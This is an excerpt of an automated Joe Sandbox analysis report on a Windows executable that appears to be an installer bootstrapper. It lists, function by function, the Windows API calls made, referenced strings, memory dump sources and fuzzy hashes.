                                                                                                                                                                        • Instruction ID: bdbb9d045f19c91d6201b3fd1e7e66079df4e25c503c0000a27273ed05105b1b
                                                                                                                                                                        • Opcode Fuzzy Hash: 3595af7428c166f5bbae25040bc968d21d01847afaa3a020c718aa5d34c35027
                                                                                                                                                                        • Instruction Fuzzy Hash: 24515272D14229DFDB20CF69DD45A9DBBB9FB48710F24422AE815F3295DB30AD05CB90
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00CD6E80: LoadLibraryW.KERNEL32(Shlwapi.dll,?,?,?,?,00CE2271,?,1FC3D414,?,?), ref: 00CD6E9B
  • Part of subcall function 00CD6E80: GetProcAddress.KERNEL32(00000000,DllGetVersion), ref: 00CD6EB1
  • Part of subcall function 00CD6E80: FreeLibrary.KERNEL32(00000000), ref: 00CD6EEA
• GetEnvironmentVariableW.KERNEL32(APPDATA,?,00000104,1FC3D414,?,?), ref: 00CE2450
Strings
Memory Dump Source
• Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
• Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
Similarity
• API ID: Library$AddressEnvironmentFreeLoadProcVariable
• String ID: AI_BOOTSTRAPPERLANGS$APPDATA$AppDataFolder$PROGRAMFILES$ProgramFiles$ProgramFilesFolder$Shell32.dll$Shlwapi.dll
• API String ID: 788177547-1020860216
• Opcode ID: 5a7d761865c31c6f35ff104dac9fb0336725c75c41a55c67d97300f8826b70cd
• Instruction ID: f8a7b25e129e182601ecc076a66ff0a0430cd4155606a97f621626339afe6648
• Opcode Fuzzy Hash: 5a7d761865c31c6f35ff104dac9fb0336725c75c41a55c67d97300f8826b70cd
• Instruction Fuzzy Hash: 1C9125716002559FDB24DF26DC45BBAB3ADFF60310F1445AAE816D72A1EB31DE44CB90
Uniqueness
• Uniqueness Score: -1.00%

APIs
• CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,1FC3D414), ref: 00CD03B9
• ReadFile.KERNEL32(00000000,00000000,00001000,?,00000000,00001000), ref: 00CD042B
• ReadFile.KERNEL32(?,00000000,00001000,00000000,00000000,?,?,00000000), ref: 00CD06CC
• CloseHandle.KERNEL32(?), ref: 00CD072A
Strings
Memory Dump Source
• Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
• Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
Similarity
• API ID: File$Read$CloseCreateHandle
• String ID: <3
• API String ID: 1724936099-878583566
• Opcode ID: 089085d62a4c22d7a4398d36d2a90b2b23b5082951571fae5541bfc4d3856828
• Instruction ID: 790cfb0950dc5084d6b86c17e0f1d0646e50387508829ab82a2217d02403e750
• Opcode Fuzzy Hash: 089085d62a4c22d7a4398d36d2a90b2b23b5082951571fae5541bfc4d3856828
• Instruction Fuzzy Hash: 44D18E71D00308DBDB20CFA8C949BAEBBB5BF45304F30825AE955AB381D774AA45CB91
Uniqueness
• Uniqueness Score: -1.00%

APIs
• CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000), ref: 00CB434F
• CloseHandle.KERNEL32(00000000), ref: 00CB4377
• WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,?), ref: 00CB43B9
• CloseHandle.KERNEL32(?), ref: 00CB440E
Strings
Memory Dump Source
• Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
• Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
Similarity
• API ID: CloseFileHandle$CreateWrite
• String ID: .bat$<3$EXE$open
• API String ID: 3602564925-2165540456
• Opcode ID: 9aa38f35704e80deeebc7bebe3315c3068f972733e8771c987b7981077bd63f3
• Instruction ID: 519afe2942d7a2f2c447af91f99189691e63c881de33c92bfaf92586149a1066
• Opcode Fuzzy Hash: 9aa38f35704e80deeebc7bebe3315c3068f972733e8771c987b7981077bd63f3
• Instruction Fuzzy Hash: DCA17970901648EFEB14CFA9CD48B9DBBF4EF45314F288299E455AB292DB709E48CF50
Uniqueness
• Uniqueness Score: -1.00%

APIs
• __Init_thread_footer.LIBCMT ref: 00BCD18F
  • Part of subcall function 00D80328: EnterCriticalSection.KERNEL32(00E97DCC,?,?,00BBACA7,00E989FC,00E05FA0), ref: 00D80332
  • Part of subcall function 00D80328: LeaveCriticalSection.KERNEL32(00E97DCC,?,00BBACA7,00E989FC,00E05FA0), ref: 00D80365
  • Part of subcall function 00D80328: RtlWakeAllConditionVariable.NTDLL ref: 00D803DC
• CreateFileW.KERNEL32(00000000,40000000,00000001,00000000,00000002,00000080,00000000,?,1FC3D416), ref: 00BCD1E3
• CloseHandle.KERNEL32(00000000), ref: 00BCD240
  • Part of subcall function 00D80372: EnterCriticalSection.KERNEL32(00E97DCC,?,?,?,00BBAC36,00E989FC,1FC3D414,?,?,00DA84ED,000000FF,?,00D11851,1FC3D414,?,?), ref: 00D8037D
  • Part of subcall function 00D80372: LeaveCriticalSection.KERNEL32(00E97DCC,?,00BBAC36,00E989FC,1FC3D414,?,?,00DA84ED,000000FF,?,00D11851,1FC3D414,?,?,00000000,?), ref: 00D803BA
• WriteFile.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 00BCD2A7
• CloseHandle.KERNEL32(00000000,742BCF00), ref: 00BCD2CD
Strings
Memory Dump Source
• Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
• Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
Similarity
• API ID: CriticalSection$CloseEnterFileHandleLeave$ConditionCreateInit_thread_footerVariableWakeWrite
• String ID: <3$aix$html
• API String ID: 2030708724-1345216711
• Opcode ID: 6749f00be51b9d7a646afeb60b8a715009a937040db4c818c5c370ecd6aa1281
• Instruction ID: 95050825d9479c7df295b6bfdb2c4925ef6f56d494c4456fab1c597a804f4d8d
• Opcode Fuzzy Hash: 6749f00be51b9d7a646afeb60b8a715009a937040db4c818c5c370ecd6aa1281
• Instruction Fuzzy Hash: A16179B0900248DFEB10DFA5D949B9EBBF4EB44708F14455EE111BB390DBB56A48CBA2
Uniqueness
• Uniqueness Score: -1.00%

APIs
• GetSystemDefaultLangID.KERNEL32 ref: 00CF573C
• GetUserDefaultLangID.KERNEL32 ref: 00CF5749
• LoadLibraryW.KERNEL32(kernel32.dll), ref: 00CF575B
• GetProcAddress.KERNEL32(00000000,GetSystemDefaultUILanguage), ref: 00CF576F
• GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 00CF5784
Strings
Memory Dump Source
• Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
• Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AddressDefaultLangProc$LibraryLoadSystemUser
                                                                                                                                                                        • String ID: GetSystemDefaultUILanguage$GetUserDefaultUILanguage$kernel32.dll
                                                                                                                                                                        • API String ID: 667524283-3528650308
                                                                                                                                                                        • Opcode ID: 0f97223814fb23572bef22f334b1b58a8b8a74ab926daec4f3d7c8e8285844cf
                                                                                                                                                                        • Instruction ID: 49236825c8a6e8c54cde782a077c2397f878ed21d5a07a57f0196300dfedddd7
                                                                                                                                                                        • Opcode Fuzzy Hash: 0f97223814fb23572bef22f334b1b58a8b8a74ab926daec4f3d7c8e8285844cf
                                                                                                                                                                        • Instruction Fuzzy Hash: 2B419E70A44745DFC784EF25E85067A77E1AFA8351F91182EFB85D3280EB34C945CB52
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • __Init_thread_footer.LIBCMT ref: 00BB9785
                                                                                                                                                                        • __Init_thread_footer.LIBCMT ref: 00BB97D0
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Init_thread_footer
                                                                                                                                                                        • String ID: </a>$<a href="$<a>$h$h
                                                                                                                                                                        • API String ID: 1385522511-3989131236
                                                                                                                                                                        • Opcode ID: 96d821116c134fc74eb92fcc606815a3cea989072299b741add978081e71b215
                                                                                                                                                                        • Instruction ID: cf226fe11a1a3abdc786118aa1701468eaf2e6f279720d969b197d6ae1283885
                                                                                                                                                                        • Opcode Fuzzy Hash: 96d821116c134fc74eb92fcc606815a3cea989072299b741add978081e71b215
                                                                                                                                                                        • Instruction Fuzzy Hash: 30919C70A00704EFDB04EFA8D845BADB7F5FF48314F10429AE525AB2D1EBB0A945CB61
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • __Init_thread_footer.LIBCMT ref: 00BC0F61
                                                                                                                                                                          • Part of subcall function 00D80328: EnterCriticalSection.KERNEL32(00E97DCC,?,?,00BBACA7,00E989FC,00E05FA0), ref: 00D80332
                                                                                                                                                                          • Part of subcall function 00D80328: LeaveCriticalSection.KERNEL32(00E97DCC,?,00BBACA7,00E989FC,00E05FA0), ref: 00D80365
                                                                                                                                                                          • Part of subcall function 00D80328: RtlWakeAllConditionVariable.NTDLL ref: 00D803DC
                                                                                                                                                                        • GetModuleHandleW.KERNEL32(Kernel32.dll,GetTempPath2W), ref: 00BC0FAA
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00BC0FB1
                                                                                                                                                                        • __Init_thread_footer.LIBCMT ref: 00BC0FC5
                                                                                                                                                                          • Part of subcall function 00D80372: EnterCriticalSection.KERNEL32(00E97DCC,?,?,?,00BBAC36,00E989FC,1FC3D414,?,?,00DA84ED,000000FF,?,00D11851,1FC3D414,?,?), ref: 00D8037D
                                                                                                                                                                          • Part of subcall function 00D80372: LeaveCriticalSection.KERNEL32(00E97DCC,?,00BBAC36,00E989FC,1FC3D414,?,?,00DA84ED,000000FF,?,00D11851,1FC3D414,?,?,00000000,?), ref: 00D803BA
                                                                                                                                                                        • GetTempPathW.KERNEL32(00000104,?,1FC3D414), ref: 00BC0FF2
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CriticalSection$EnterInit_thread_footerLeave$AddressConditionHandleModulePathProcTempVariableWake
                                                                                                                                                                        • String ID: GetTempPath2W$Kernel32.dll
                                                                                                                                                                        • API String ID: 3676318360-1983778095
                                                                                                                                                                        • Opcode ID: f6ed17c89e9c0abb3f308bc7b2450095ac397820df6dbba85a4acfc9d15e9315
                                                                                                                                                                        • Instruction ID: c61c22b59b0d64512b9b91716a78b18e15ebf347ce1ca56dfc20a54a22a43884
                                                                                                                                                                        • Opcode Fuzzy Hash: f6ed17c89e9c0abb3f308bc7b2450095ac397820df6dbba85a4acfc9d15e9315
                                                                                                                                                                        • Instruction Fuzzy Hash: 8C81A5B1D00208EFDB20DF98DC85BDDB7F4EB18710F5046AEE515A7281DB746A48CBA1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • SetLastError.KERNEL32(0000000E,1FC3D414,?,?,00000000,?), ref: 00BC908E
                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00BC90CF
                                                                                                                                                                        • EnterCriticalSection.KERNEL32(00E9E7BC), ref: 00BC90EF
                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(00E9E7BC), ref: 00BC9113
                                                                                                                                                                        • CreateWindowExW.USER32(00000000,00000000,00000000,00E9E7BC,?,80000000,00000000,80000000,00000000,00000000,00000000), ref: 00BC916E
                                                                                                                                                                          • Part of subcall function 00D7FA13: GetProcessHeap.KERNEL32(00000008,00000008,00000000,00CF5F3E,?,?,?,?,?,?), ref: 00D7FA18
                                                                                                                                                                          • Part of subcall function 00D7FA13: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?), ref: 00D7FA1F
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CriticalHeapSection$AllocCreateCurrentEnterErrorLastLeaveProcessThreadWindow
                                                                                                                                                                        • String ID: AXWIN UI Window$K
                                                                                                                                                                        • API String ID: 213679520-2178310310
                                                                                                                                                                        • Opcode ID: d14d4d3fb2f72d5c5de58e70f9a98c03203f424ff6aa3bf72ef8fd34b02ccb16
                                                                                                                                                                        • Instruction ID: d8ff855bc92f0486dbf1a054344dc75d79381c12ab1ccb051a231618af8ede57
                                                                                                                                                                        • Opcode Fuzzy Hash: d14d4d3fb2f72d5c5de58e70f9a98c03203f424ff6aa3bf72ef8fd34b02ccb16
                                                                                                                                                                        • Instruction Fuzzy Hash: CF51A271600305AFEB10CF59DD09F9ABBF4FB88B14F14816EF954A7280D771A818CBA1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(00E9948C,00000000,1FC3D414,00000000,00DE4033,000000FF,?,1FC3D414), ref: 00BB2853
                                                                                                                                                                        • GetLastError.KERNEL32(?,1FC3D414), ref: 00BB285D
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CountCriticalErrorInitializeLastSectionSpin
                                                                                                                                                                        • String ID: <Y$VolumeCostDifference$VolumeCostRequired$VolumeCostVolume$dY
                                                                                                                                                                        • API String ID: 439134102-2465320836
                                                                                                                                                                        • Opcode ID: e9c0e50947c95f25d69be2a1b46571b94308ca759cdf0cb762d7e57f214945e1
                                                                                                                                                                        • Instruction ID: c04457e1057e9ca651492e9cdf1ab9ea796485014162047599b93634b07d074b
                                                                                                                                                                        • Opcode Fuzzy Hash: e9c0e50947c95f25d69be2a1b46571b94308ca759cdf0cb762d7e57f214945e1
                                                                                                                                                                        • Instruction Fuzzy Hash: C751E1B1900208DFDB11CF6AED457EEBBF4EB48714F00026AD425B7291E7B559098BA1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

APIs
• SHGetSpecialFolderLocation.SHELL32(00000000,00000023,?,00E994D0), ref: 00D135C0
• LoadLibraryW.KERNEL32(Shell32.dll), ref: 00D135D3
• GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00D135E3
• SHGetPathFromIDListW.SHELL32(?,00000000), ref: 00D1366C
• SHGetMalloc.SHELL32(?), ref: 00D136AE
Strings
Memory Dump Source
• Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
• Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
Similarity
• API ID: AddressFolderFromLibraryListLoadLocationMallocPathProcSpecial
• String ID: SHGetSpecialFolderPathW$Shell32.dll
• API String ID: 2352187698-2988203397
• Opcode ID: c85c7c21a36747508e680bbf18865c53172573732406433ff52ab141590d330e
• Instruction ID: ebdad87b11af7819e5e5f9eacf97eb18e65847c4cf2d30fc3f943ad394660c9e
• Opcode Fuzzy Hash: c85c7c21a36747508e680bbf18865c53172573732406433ff52ab141590d330e
• Instruction Fuzzy Hash: 6731B371600701BBDB249F24EC05BA7B7F5AF94711F48842DE88997290EF7199C98BA1
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetWindowLongW.USER32(?,000000EB), ref: 00CD8451
• EndDialog.USER32(?,00000000), ref: 00CD8529
Memory Dump Source
• Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
• Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
Similarity
• API ID: DialogLongWindow
• String ID:
• API String ID: 900524653-0
• Opcode ID: 6fff1646b263a4fd1cda05cbb2d24b85273ee87272819e04dea3bae724cdec71
• Instruction ID: 3aa7cc916a9bc3ee29619d3518b89301dea48fc022591c8badbf71ff69d9d193
• Opcode Fuzzy Hash: 6fff1646b263a4fd1cda05cbb2d24b85273ee87272819e04dea3bae724cdec71
• Instruction Fuzzy Hash: F741F3322182142BD634AE3DAC09B7A3B9CDB85331F00072BFEA5D23D1DA61DD19D6A1
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetWindowRect.USER32(?,?), ref: 00BD007A
• GetWindow.USER32(?,00000005), ref: 00BD0087
• GetWindow.USER32(00000000,00000002), ref: 00BD01C2
  • Part of subcall function 00BCFED0: GetWindowRect.USER32(?,?), ref: 00BCFEFC
  • Part of subcall function 00BCFED0: GetWindowRect.USER32(?,?), ref: 00BCFF0C
• GetWindowRect.USER32(?,?), ref: 00BD011B
• GetWindowRect.USER32(00000000,?), ref: 00BD012B
• GetWindowRect.USER32(00000000,?), ref: 00BD0145
Memory Dump Source
• Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
• Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
Similarity
• API ID: Window$Rect
• String ID:
• API String ID: 3200805268-0
• Opcode ID: 2f60d506065339d56b1f145e8b21a5f28e7dfd3fc6fd79950bad6a297e2021ab
• Instruction ID: 80049c46610233a126cba94040044d75f8f41f4c1975b7c44fb507ada457f250
• Opcode Fuzzy Hash: 2f60d506065339d56b1f145e8b21a5f28e7dfd3fc6fd79950bad6a297e2021ab
• Instruction Fuzzy Hash: EC418D315147019FC321EF29C980A6BF7EAFF96704F544A5EF085A7661EB30E988CB52
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetProcessHeap.KERNEL32(00000008,0000000D,00000000,?,00D7FA5B,?,?,?,?,?,?,?), ref: 00D7F8D5
• HeapAlloc.KERNEL32(00000000,?,00D7FA5B,?,?,?,?,?,?,?), ref: 00D7F8DC
  • Part of subcall function 00D7F9A7: IsProcessorFeaturePresent.KERNEL32(0000000C,00D7F8C3,00000000,?,00D7FA5B,?,?,?,?,?,?,?), ref: 00D7F9A9
• InterlockedPopEntrySList.KERNEL32(00000000,00000000,?,00D7FA5B,?,?,?,?,?,?,?), ref: 00D7F8EC
• VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,00D7FA5B,?,?,?,?,?,?,?), ref: 00D7F913
• RaiseException.KERNEL32(C0000017,00000000,00000000,00000000,?,00D7FA5B,?,?,?,?,?,?,?), ref: 00D7F927
• InterlockedPopEntrySList.KERNEL32(00000000,?,00D7FA5B,?,?,?,?,?,?,?), ref: 00D7F93A
• VirtualFree.KERNEL32(00000000,00000000,00008000,?,00D7FA5B,?,?,?,?,?,?,?), ref: 00D7F94D
Memory Dump Source
• Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
• Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
Similarity
• API ID: AllocEntryHeapInterlockedListVirtual$ExceptionFeatureFreePresentProcessProcessorRaise
• String ID:
• API String ID: 2460949444-0
• Opcode ID: f49f88e6768d0ab5c6f0c88ff9b43ec59332be7a0593fc720f1057d525876d5d
• Instruction ID: 2ea9780efe5a57819051fc7118235fb0bb31a59fb66211a8707a80ff61e9fae1
• Opcode Fuzzy Hash: f49f88e6768d0ab5c6f0c88ff9b43ec59332be7a0593fc720f1057d525876d5d
• Instruction Fuzzy Hash: 9311BFB1605A11BFE6321779AD49F3E6658EF44784F148532FBC9F6260EB61CC488AB0
Uniqueness

Uniqueness Score: -1.00%

APIs
• __Init_thread_footer.LIBCMT ref: 00C7E7C5
• __Init_thread_footer.LIBCMT ref: 00C7E891
Strings
Memory Dump Source
• Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
• Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
